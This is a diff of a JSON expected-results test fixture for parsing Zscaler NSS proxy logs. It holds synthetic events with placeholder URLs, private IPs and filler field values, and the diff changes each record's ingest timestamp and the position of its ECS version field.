@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "iusm ZSCALERNSS: time=modtempo Jan 29 6:09:59 2016^^timezone=GMT+02:00^^action=Blocked^^reason=failure^^hostname=rci737.www5.example^^protocol=tcp^^serverip=10.206.191.17^^url=https://api.example.com/ivelitse/ritin.htm?utl=vol#amremap^^urlcategory=oremi^^urlclass=ntsunti^^dlpdictionaries=nseq^^dlpengine=itinvol^^filetype=psa^^threatcategory=umq^^threatclass=ntium^^pagerisk=psaq^^threatname=cer^^clientpublicIP=reveri^^ClientIP=10.176.10.114^^location=lupt^^refererURL=https://internal.example.org/sequa/abo.gif?umqui=reeufugi#mdolo^^useragent=Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16^^department=sperna^^user=sumdo^^event_id=litesse^^clienttranstime=orev^^requestmethod=pisciv^^requestsize=1884^^requestversion=deF^^status=sist^^responsesize=1803^^responseversion=doeiu^^transactionsize=3942", "event": { - "ingested": "2021-06-14T08:26:19.844685200Z" + "ingested": "2021-12-14T14:59:54.590713416Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "olupt ZSCALERNSS: time=volup Feb 12 1:12:33 2016^^timezone=CT^^action=Allowed^^reason=failure^^hostname=eosquir5191.www.example^^protocol=rdp^^serverip=10.173.22.152^^url=https://internal.example.net/isiutal/moenimi.jpg?gnaali=enatus#mquia^^urlcategory=ameaqu^^urlclass=aqu^^dlpdictionaries=utper^^dlpengine=squame^^filetype=ntex^^threatcategory=eius^^threatclass=luptat^^pagerisk=emape^^threatname=aer^^clientpublicIP=lupt^^ClientIP=10.26.46.95^^location=uame^^refererURL=https://www.example.net/orisn/cca.htm?ofdeF=metcons#roinBCS^^useragent=Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile 
Safari/537.36^^department=com^^user=eataevi^^event_id=byC^^clienttranstime=tinculp^^requestmethod=tur^^requestsize=2977^^requestversion=equat^^status=atemsequ^^responsesize=2004^^responseversion=minim^^transactionsize=7868", "event": { - "ingested": "2021-06-14T08:26:19.844707300Z" + "ingested": "2021-12-14T14:59:54.590716461Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amco ZSCALERNSS: time=exe Feb 26 8:15:08 2016^^timezone=CT^^action=Blocked^^reason=success^^hostname=orsitame3262.domain^^protocol=igmp^^serverip=10.204.86.149^^url=https://example.com/taspe/mvolu.gif?atcup=snos#iquaUte^^urlcategory=tconsec^^urlclass=nsequat^^dlpdictionaries=taev^^dlpengine=roidents^^filetype=oluptas^^threatcategory=llu^^threatclass=uptassi^^pagerisk=tamremap^^threatname=tur^^clientpublicIP=aperi^^ClientIP=10.254.146.57^^location=estqui^^refererURL=https://www5.example.net/emaper/ssitasp.html?enimad=rmagni#sit^^useragent=Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=onev^^user=tenima^^event_id=laboreet^^clienttranstime=aquaeabi^^requestmethod=giatq^^requestsize=2935^^requestversion=veleumi^^status=tia^^responsesize=1837^^responseversion=ude^^transactionsize=6905", "event": { - "ingested": "2021-06-14T08:26:19.844714500Z" + "ingested": "2021-12-14T14:59:54.590716960Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uian ZSCALERNSS: time=tempo Mar 12 3:17:42 
2016^^timezone=PST^^action=Allowed^^reason=failure^^hostname=tempor4496.www.localdomain^^protocol=ipv6^^serverip=10.103.246.190^^url=https://api.example.org/doloreeu/pori.jpg?itati=mfu#uid^^urlcategory=atatnonp^^urlclass=uiano^^dlpdictionaries=mrema^^dlpengine=autfu^^filetype=natura^^threatcategory=aboris^^threatclass=ima^^pagerisk=tanimi^^threatname=nimadmin^^clientpublicIP=erep^^ClientIP=10.252.125.53^^location=ugiatqu^^refererURL=https://internal.example.net/Utenimad/nibusBon.html?emq=isiu#nimadmi^^useragent=Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=ari^^user=equun^^event_id=suntinc^^clienttranstime=elits^^requestmethod=llam^^requestsize=3077^^requestversion=gelits^^status=tatevel^^responsesize=3856^^responseversion=uptatev^^transactionsize=4292", "event": { - "ingested": "2021-06-14T08:26:19.844720400Z" + "ingested": "2021-12-14T14:59:54.590717498Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dmi ZSCALERNSS: time=olab Mar 26 10:20:16 2016^^timezone=GMT-07:00^^action=Blocked^^reason=unknown^^hostname=ore2933.www.test^^protocol=ipv6-icmp^^serverip=10.61.78.108^^url=https://api.example.com/ele/tenbyCic.gif?porainc=amquisno#iinea^^urlcategory=ipit^^urlclass=idexea^^dlpdictionaries=riat^^dlpengine=luptatem^^filetype=umdolor^^threatcategory=osquir^^threatclass=inim^^pagerisk=ema^^threatname=roinBCSe^^clientpublicIP=onse^^ClientIP=10.136.153.149^^location=animi^^refererURL=https://www5.example.org/ofdeF/tion.htm?emqu=lit#iam^^useragent=Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=ciati^^user=ercit^^event_id=umdolore^^clienttranstime=eniam^^requestmethod=reetdolo^^requestsize=2451^^requestversion=onse^^status=rumet^^responsesize=5772^^responseversion=tatno^^transactionsize=6787", "event": { - 
"ingested": "2021-06-14T08:26:19.844727400Z" + "ingested": "2021-12-14T14:59:54.590718065Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "llam ZSCALERNSS: time=aspern Apr 9 5:22:51 2016^^timezone=GMT-07:00^^action=Allowed^^reason=success^^hostname=ollit4105.mail.localdomain^^protocol=ipv6-icmp^^serverip=10.183.16.166^^url=https://mail.example.org/sitas/ehenderi.jpg?atquovo=iumto#aboreetd^^urlcategory=sun^^urlclass=essecill^^dlpdictionaries=Duisau^^dlpengine=psum^^filetype=eriame^^threatcategory=lorema^^threatclass=avol^^pagerisk=labor^^threatname=atuse^^clientpublicIP=ddoeiu^^ClientIP=10.66.250.92^^location=onse^^refererURL=https://example.com/metcon/smo.jpg?upta=omn#ipsumq^^useragent=Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36^^department=ons^^user=tessec^^event_id=remipsum^^clienttranstime=liq^^requestmethod=ist^^requestsize=571^^requestversion=caecatc^^status=onsequat^^responsesize=2984^^responseversion=edquiano^^transactionsize=6061", "event": { - "ingested": "2021-06-14T08:26:19.844733Z" + "ingested": "2021-12-14T14:59:54.590718547Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ema ZSCALERNSS: time=par Apr 24 12:25:25 2016^^timezone=PT^^action=Blocked^^reason=unknown^^hostname=cup1793.local^^protocol=ipv6^^serverip=10.243.224.205^^url=https://mail.example.net/aborumSe/luptat.txt?antiumto=strude#ctetura^^urlcategory=usmod^^urlclass=edqui^^dlpdictionaries=mquidol^^dlpengine=ita^^filetype=ipi^^threatcategory=rsitamet^^threatclass=lupt^^pagerisk=xea^^threatname=qua^^clientpublicIP=luptatev^^ClientIP=10.123.104.59^^location=uisquam^^refererURL=https://api.example.com/loremq/lores.txt?iqui=etc#etM^^useragent=Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36^^department=eprehen^^user=xercitat^^event_id=lpa^^clienttranstime=entsu^^requestmethod=dun^^requestsize=941^^requestversion=aliq^^status=rsitam^^responsesize=2053^^responseversion=imaven^^transactionsize=152", "event": { - "ingested": "2021-06-14T08:26:19.844738100Z" + "ingested": "2021-12-14T14:59:54.590719055Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tema ZSCALERNSS: time=ritatis May 8 7:27:59 2016^^timezone=GMT+02:00^^action=Blocked^^reason=unknown^^hostname=icab4668.local^^protocol=udp^^serverip=10.119.185.63^^url=https://www5.example.net/ntutla/equa.jpg?civeli=errorsi#des^^urlcategory=rehe^^urlclass=ume^^dlpdictionaries=incidi^^dlpengine=picia^^filetype=mUtenima^^threatcategory=emaperi^^threatclass=tame^^pagerisk=tinvol^^threatname=tectobe^^clientpublicIP=colabor^^ClientIP=10.74.17.5^^location=untut^^refererURL=https://internal.example.net/ommod/sequatur.txt?tlabo=suntexp#ugiatnu^^useragent=Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80^^department=itecto^^user=erc^^event_id=amqu^^clienttranstime=uines^^requestmethod=nsec^^requestsize=6907^^requestversion=estqu^^status=inibusBo^^responsesize=6888^^responseversion=ostrume^^transactionsize=6051", "event": { - "ingested": "2021-06-14T08:26:19.844743300Z" + "ingested": "2021-12-14T14:59:54.590719447Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "upt ZSCALERNSS: time=uiineavo May 22 2:30:33 
2016^^timezone=CET^^action=Allowed^^reason=unknown^^hostname=aperia4409.www5.invalid^^protocol=rdp^^serverip=10.78.151.178^^url=https://api.example.net/atvol/umiur.txt?tati=utaliqu#oriosamn^^urlcategory=deFinibu^^urlclass=iadese^^dlpdictionaries=imidest^^dlpengine=emagnama^^filetype=eprehend^^threatcategory=hil^^threatclass=atquovo^^pagerisk=suntinc^^threatname=xeac^^clientpublicIP=nidolo^^ClientIP=10.25.192.202^^location=intoccae^^refererURL=https://www.example.net/pida/nse.html?emeumfu=CSed#lupt^^useragent=Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=ecillu^^user=quip^^event_id=mporain^^clienttranstime=icons^^requestmethod=amvolup^^requestsize=7700^^requestversion=temveleu^^status=colabo^^responsesize=6354^^responseversion=orinrepr^^transactionsize=6578", "event": { - "ingested": "2021-06-14T08:26:19.844748400Z" + "ingested": "2021-12-14T14:59:54.590719909Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rumetM ZSCALERNSS: time=equi Jun 5 9:33:08 2016^^timezone=GMT+02:00^^action=Allowed^^reason=success^^hostname=sitvolup368.internal.host^^protocol=igmp^^serverip=10.71.170.37^^url=https://mail.example.net/equep/iavolu.gif?aqu=rpo#uipe^^urlcategory=inesci^^urlclass=serror^^dlpdictionaries=aliqu^^dlpengine=olupta^^filetype=mipsumd^^threatcategory=eFinib^^threatclass=ihilm^^pagerisk=atDu^^threatname=eav^^clientpublicIP=ionevo^^ClientIP=10.135.225.244^^location=orev^^refererURL=https://api.example.net/quirat/llu.jpg?isc=aturve#emulla^^useragent=Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=atiset^^user=atu^^event_id=umexerci^^clienttranstime=ern^^requestmethod=psaquae^^requestsize=7355^^requestversion=nsectet^^status=utla^^responsesize=5269^^responseversion=sci^^transactionsize=2526", "event": { - 
"ingested": "2021-06-14T08:26:19.844765Z" + "ingested": "2021-12-14T14:59:54.590720299Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tlabori ZSCALERNSS: time=oin Jun 20 4:35:42 2016^^timezone=ET^^action=Allowed^^reason=success^^hostname=ite2026.www.invalid^^protocol=udp^^serverip=10.223.247.86^^url=https://example.org/bor/occa.htm?dol=leumiu#namali^^urlcategory=taevit^^urlclass=rinrepre^^dlpdictionaries=etconse^^dlpengine=tincu^^filetype=ari^^threatcategory=exercit^^threatclass=sci^^pagerisk=quamnih^^threatname=oluptate^^clientpublicIP=onseq^^ClientIP=10.19.145.131^^location=texp^^refererURL=https://internal.example.net/acc/amc.txt?amest=corp#modtemp^^useragent=Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36^^department=oluptas^^user=tNequepo^^event_id=lup^^clienttranstime=nula^^requestmethod=emseq^^requestsize=821^^requestversion=ento^^status=pic^^responsesize=752^^responseversion=eriamea^^transactionsize=7741", "event": { - "ingested": "2021-06-14T08:26:19.844826500Z" + "ingested": "2021-12-14T14:59:54.590720677Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rsita ZSCALERNSS: time=niamqui Jul 4 11:38:16 2016^^timezone=GMT-07:00^^action=Allowed^^reason=failure^^hostname=radipisc7020.home^^protocol=ipv6^^serverip=10.2.53.125^^url=https://internal.example.net/oru/temqu.htm?etMalor=ipi#reseos^^urlcategory=pariatu^^urlclass=tin^^dlpdictionaries=tenima^^dlpengine=tsedqu^^filetype=agnid^^threatcategory=proide^^threatclass=dolorem^^pagerisk=tlab^^threatname=volupt^^clientpublicIP=osqui^^ClientIP=10.181.80.139^^location=hitecto^^refererURL=https://www.example.net/liquide/etdol.jpg?uun=sequine#ectio^^useragent=Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/83.0.4103.83 Safari/537.36^^department=aboN^^user=ihilmo^^event_id=radi^^clienttranstime=gel^^requestmethod=lorsitam^^requestsize=6408^^requestversion=veniam^^status=ris^^responsesize=3314^^responseversion=ulapa^^transactionsize=7298", "event": { - "ingested": "2021-06-14T08:26:19.844838300Z" + "ingested": "2021-12-14T14:59:54.590721219Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "quioffi ZSCALERNSS: time=uptate Jul 18 6:40:50 2016^^timezone=ET^^action=Allowed^^reason=unknown^^hostname=uamei2493.www.test^^protocol=tcp^^serverip=10.31.240.6^^url=https://mail.example.net/itatione/isnis.html?oluptate=issus#osamn^^urlcategory=isnisiu^^urlclass=bore^^dlpdictionaries=tsu^^dlpengine=tcons^^filetype=sciun^^threatcategory=sBono^^threatclass=catc^^pagerisk=nsect^^threatname=idata^^clientpublicIP=rumwritt^^ClientIP=10.167.98.76^^location=dol^^refererURL=https://api.example.org/citation/tisetq.html?Utenimad=orpor#tlabo^^useragent=Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36^^department=gnido^^user=ratvolu^^event_id=olup^^clienttranstime=numqua^^requestmethod=veni^^requestsize=3140^^requestversion=abo^^status=veniamqu^^responsesize=2742^^responseversion=aliquide^^transactionsize=3073", "event": { - "ingested": "2021-06-14T08:26:19.844845300Z" + "ingested": "2021-12-14T14:59:54.590721663Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "equat ZSCALERNSS: time=derit Aug 2 1:43:25 
2016^^timezone=PT^^action=Allowed^^reason=success^^hostname=piscin6866.internal.host^^protocol=udp^^serverip=10.0.55.9^^url=https://www.example.org/eporr/xeacomm.html?aturQui=utlabor#rau^^urlcategory=idex^^urlclass=mfugiat^^dlpdictionaries=nisiuta^^dlpengine=tvolu^^filetype=ecte^^threatcategory=tinvolu^^threatclass=iurer^^pagerisk=iciadese^^threatname=quidolor^^clientpublicIP=tessec^^ClientIP=10.135.160.125^^location=mve^^refererURL=https://internal.example.com/uisau/eleum.htm?nre=ercitat#inim^^useragent=Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36^^department=Utenima^^user=volupta^^event_id=rcitati^^clienttranstime=eni^^requestmethod=ionevo^^requestsize=3616^^requestversion=Ute^^status=sperna^^responsesize=5368^^responseversion=mnisi^^transactionsize=509", "event": { - "ingested": "2021-06-14T08:26:19.844850700Z" + "ingested": "2021-12-14T14:59:54.590722594Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tDuisaut ZSCALERNSS: time=oinBC Aug 16 8:45:59 2016^^timezone=OMST^^action=Allowed^^reason=unknown^^hostname=spi3544.www.host^^protocol=ggp^^serverip=10.63.250.128^^url=https://internal.example.net/ptatemq/luptatev.html?Nequepo=ipsumd#ntocc^^urlcategory=uteirure^^urlclass=nevo^^dlpdictionaries=ide^^dlpengine=aali^^filetype=adip^^threatcategory=tium^^threatclass=nnum^^pagerisk=tenbyCi^^threatname=ate^^clientpublicIP=uiac^^ClientIP=10.111.187.12^^location=itam^^refererURL=https://www.example.org/santiumd/turadip.gif?niamqui=orem#sno^^useragent=Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile 
Safari/537.36^^department=tev^^user=saute^^event_id=ntocca^^clienttranstime=ostru^^requestmethod=ntoccae^^requestsize=1705^^requestversion=rrorsi^^status=temquiav^^responsesize=6027^^responseversion=sec^^transactionsize=1927", "event": { - "ingested": "2021-06-14T08:26:19.844855800Z" + "ingested": "2021-12-14T14:59:54.590722996Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sBon ZSCALERNSS: time=orro Aug 30 3:48:33 2016^^timezone=PST^^action=Allowed^^reason=unknown^^hostname=tlab5981.www.host^^protocol=igmp^^serverip=10.5.126.127^^url=https://www5.example.com/tateve/itinvol.txt?tenatus=cipitlab#ipsumd^^urlcategory=antiu^^urlclass=uirati^^dlpdictionaries=oin^^dlpengine=exe^^filetype=imadmini^^threatcategory=sauteiru^^threatclass=mod^^pagerisk=hilm^^threatname=ataevi^^clientpublicIP=com^^ClientIP=10.252.124.150^^location=trud^^refererURL=https://mail.example.org/litessec/itas.htm?uidol=mporin#mwrit^^useragent=Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36^^department=roid^^user=inibusB^^event_id=eprehen^^clienttranstime=entor^^requestmethod=xeacomm^^requestsize=1940^^requestversion=utp^^status=ema^^responsesize=1394^^responseversion=itessequ^^transactionsize=7688", "event": { - "ingested": "2021-06-14T08:26:19.844860600Z" + "ingested": "2021-12-14T14:59:54.590723395Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ine ZSCALERNSS: time=lup Sep 13 10:51:07 
2016^^timezone=CT^^action=Blocked^^reason=success^^hostname=upida508.example^^protocol=tcp^^serverip=10.201.171.120^^url=https://api.example.net/tquiin/tse.jpg?ovol=ptasn#taedicta^^urlcategory=itam^^urlclass=str^^dlpdictionaries=idolore^^dlpengine=pid^^filetype=illoin^^threatcategory=tanimid^^threatclass=umdo^^pagerisk=natuse^^threatname=gnamal^^clientpublicIP=metMalo^^ClientIP=10.91.126.231^^location=reprehen^^refererURL=https://example.net/psumquia/ven.html?siutali=amnih#ium^^useragent=Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36^^department=tau^^user=exercita^^event_id=ris^^clienttranstime=eumiu^^requestmethod=orumSe^^requestsize=728^^requestversion=isnost^^status=queips^^responsesize=248^^responseversion=itess^^transactionsize=52", "event": { - "ingested": "2021-06-14T08:26:19.844865400Z" + "ingested": "2021-12-14T14:59:54.590723901Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ofdeFini ZSCALERNSS: time=irat Sep 28 5:53:42 2016^^timezone=GMT+02:00^^action=Allowed^^reason=unknown^^hostname=oditem5255.api.localdomain^^protocol=tcp^^serverip=10.135.82.97^^url=https://mail.example.org/olor/ineavo.gif?mquelau=iadolor#amcol^^urlcategory=adeser^^urlclass=oin^^dlpdictionaries=mvenia^^dlpengine=madminim^^filetype=fugitsed^^threatcategory=quam^^threatclass=quid^^pagerisk=fugiat^^threatname=atisun^^clientpublicIP=esci^^ClientIP=10.107.251.87^^location=fugi^^refererURL=https://www.example.net/iduntu/idestlab.htm?avol=icero#xer^^useragent=Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36^^department=nturma^^user=str^^event_id=iat^^clienttranstime=etur^^requestmethod=itecto^^requestsize=1300^^requestversion=borios^^status=tut^^responsesize=2703^^responseversion=umqu^^transactionsize=301", 
"event": { - "ingested": "2021-06-14T08:26:19.844870200Z" + "ingested": "2021-12-14T14:59:54.590724397Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "adipisc ZSCALERNSS: time=uscipitl Oct 12 12:56:16 2016^^timezone=PST^^action=Blocked^^reason=unknown^^hostname=uamei2389.internal.example^^protocol=ipv6-icmp^^serverip=10.31.198.58^^url=https://www.example.com/its/ender.gif?oles=edic#seq^^urlcategory=tutlab^^urlclass=sau^^dlpdictionaries=atevelit^^dlpengine=meius^^filetype=billo^^threatcategory=labo^^threatclass=oNemoeni^^pagerisk=ttenby^^threatname=boris^^clientpublicIP=stenatu^^ClientIP=10.215.205.216^^location=ratv^^refererURL=https://www.example.net/ianon/tsed.htm?ameiusm=proide#ano^^useragent=Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=boreetdo^^user=aturve^^event_id=ditemp^^clienttranstime=edqui^^requestmethod=nre^^requestsize=7231^^requestversion=sit^^status=olab^^responsesize=100^^responseversion=elitse^^transactionsize=6672", "event": { - "ingested": "2021-06-14T08:26:19.844874900Z" + "ingested": "2021-12-14T14:59:54.590724795Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "quasia ZSCALERNSS: time=adi Oct 26 7:58:50 2016^^timezone=PST^^action=Allowed^^reason=failure^^hostname=eacommod1930.internal.lan^^protocol=igmp^^serverip=10.29.155.171^^url=https://www5.example.org/oeni/tdol.gif?llamco=nea#psum^^urlcategory=tasnulap^^urlclass=orsit^^dlpdictionaries=asiar^^dlpengine=ise^^filetype=itau^^threatcategory=apariat^^threatclass=vitaedi^^pagerisk=lorsita^^threatname=dolore^^clientpublicIP=uptate^^ClientIP=10.229.83.165^^location=ugiat^^refererURL=https://internal.example.com/ate/odoconse.jpg?quatu=veli#tenim^^useragent=Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 
(KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]^^department=labo^^user=ulapar^^event_id=aboreetd^^clienttranstime=hilm^^requestmethod=llitanim^^requestsize=5047^^requestversion=pitl^^status=por^^responsesize=7205^^responseversion=ama^^transactionsize=332", "event": { - "ingested": "2021-06-14T08:26:19.844880600Z" + "ingested": "2021-12-14T14:59:54.590725176Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "adminimv ZSCALERNSS: time=odi Nov 10 3:01:24 2016^^timezone=GMT-07:00^^action=Blocked^^reason=success^^hostname=tem6984.www5.domain^^protocol=ipv6^^serverip=10.129.192.145^^url=https://www.example.com/uasiar/utlab.htm?loremqu=dantium#lor^^urlcategory=velillu^^urlclass=cteturad^^dlpdictionaries=bor^^dlpengine=rauto^^filetype=ationev^^threatcategory=umdolor^^threatclass=uaUten^^pagerisk=nby^^threatname=mve^^clientpublicIP=osqui^^ClientIP=10.161.148.64^^location=ibusBon^^refererURL=https://example.com/rQu/mco.jpg?dun=reprehe#tincu^^useragent=Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36^^department=dex^^user=lor^^event_id=oraincid^^clienttranstime=intocc^^requestmethod=amcorp^^requestsize=1275^^requestversion=ssecillu^^status=liqua^^responsesize=6498^^responseversion=utodita^^transactionsize=4014", "event": { - "ingested": "2021-06-14T08:26:19.844901600Z" + "ingested": "2021-12-14T14:59:54.590725576Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "fdeF ZSCALERNSS: time=iquidexe Nov 24 10:03:59 
2016^^timezone=CEST^^action=Allowed^^reason=failure^^hostname=lapariat7287.internal.host^^protocol=ggp^^serverip=10.7.200.140^^url=https://api.example.org/icabo/gna.html?urerepr=eseru#quamest^^urlcategory=mac^^urlclass=qui^^dlpdictionaries=ritin^^dlpengine=temporin^^filetype=equatur^^threatcategory=adeseru^^threatclass=tdol^^pagerisk=upt^^threatname=mex^^clientpublicIP=tatem^^ClientIP=10.203.65.161^^location=eveli^^refererURL=https://internal.example.com/oremq/dicta.htm?imide=poriss#tvolup^^useragent=Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91^^department=siu^^user=snost^^event_id=tpersp^^clienttranstime=llamc^^requestmethod=nte^^requestsize=3571^^requestversion=utali^^status=porinc^^responsesize=6392^^responseversion=mvolu^^transactionsize=1664", "event": { - "ingested": "2021-06-14T08:26:19.844910300Z" + "ingested": "2021-12-14T14:59:54.590726056Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ipi ZSCALERNSS: time=imveniam Dec 8 5:06:33 2016^^timezone=GMT-07:00^^action=Blocked^^reason=unknown^^hostname=licabo1493.api.corp^^protocol=icmp^^serverip=10.86.22.67^^url=https://api.example.org/oremi/elites.html?iosa=boNemoe#onsequ^^urlcategory=equinesc^^urlclass=cab^^dlpdictionaries=atisund^^dlpengine=xea^^filetype=ites^^threatcategory=isetq^^threatclass=iutali^^pagerisk=velite^^threatname=teturad^^clientpublicIP=perspici^^ClientIP=10.218.98.29^^location=iconseq^^refererURL=https://www5.example.org/atisetqu/issuscip.jpg?dipisci=spernatu#admi^^useragent=Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile 
Safari/537.36^^department=quunt^^user=olori^^event_id=mquae^^clienttranstime=eriti^^requestmethod=atcupi^^requestsize=2332^^requestversion=plica^^status=ore^^responsesize=7595^^responseversion=emqu^^transactionsize=2846", "event": { - "ingested": "2021-06-14T08:26:19.844917500Z" + "ingested": "2021-12-14T14:59:54.590726445Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "acommod ZSCALERNSS: time=itsedd Dec 23 12:09:07 2016^^timezone=CT^^action=Allowed^^reason=success^^hostname=stenatu4844.www.invalid^^protocol=rdp^^serverip=10.39.31.115^^url=https://example.com/luptatem/uaeratv.gif?dat=periam#dqu^^urlcategory=pid^^urlclass=rExc^^dlpdictionaries=iusmo^^dlpengine=tame^^filetype=naaliq^^threatcategory=nte^^threatclass=ulpa^^pagerisk=sitam^^threatname=rad^^clientpublicIP=loi^^ClientIP=10.24.111.229^^location=volupt^^refererURL=https://example.net/idid/tesse.txt?boru=ptateve#enderi^^useragent=Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36^^department=toccaec^^user=fugi^^event_id=labo^^clienttranstime=nostrud^^requestmethod=gnaal^^requestsize=7224^^requestversion=proident^^status=maliquam^^responsesize=2147^^responseversion=atione^^transactionsize=5702", "event": { - "ingested": "2021-06-14T08:26:19.844922900Z" + "ingested": "2021-12-14T14:59:54.590726956Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { 